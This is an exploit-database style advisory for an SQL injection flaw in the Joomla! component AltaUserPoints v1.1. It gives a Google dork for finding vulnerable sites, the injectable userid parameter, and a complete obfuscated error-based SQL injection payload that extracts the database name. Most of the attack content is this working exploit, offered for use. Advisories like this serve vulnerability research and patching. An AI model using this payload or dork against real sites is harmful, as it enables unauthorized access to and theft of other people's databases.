Joomla! Component AltaUserPoints v1.1 - userid SQL Injection, allows unauthorized access
# # # # #
# Exploit Title: Joomla! Component AltaUserPoints v1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_altauserpoints
# Date: 04.03.2017
# Vendor Homepage:
# Software:
# Demo:
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web:
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_altauserpoints&view=account&userid=[SQL]
# 1'+/*!50000OR*/+1+/*!50000GROUP*/+BY+/*!50000CONCAT_WS*/(0x3a,0x496873616e53656e63616e,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
# # # # #
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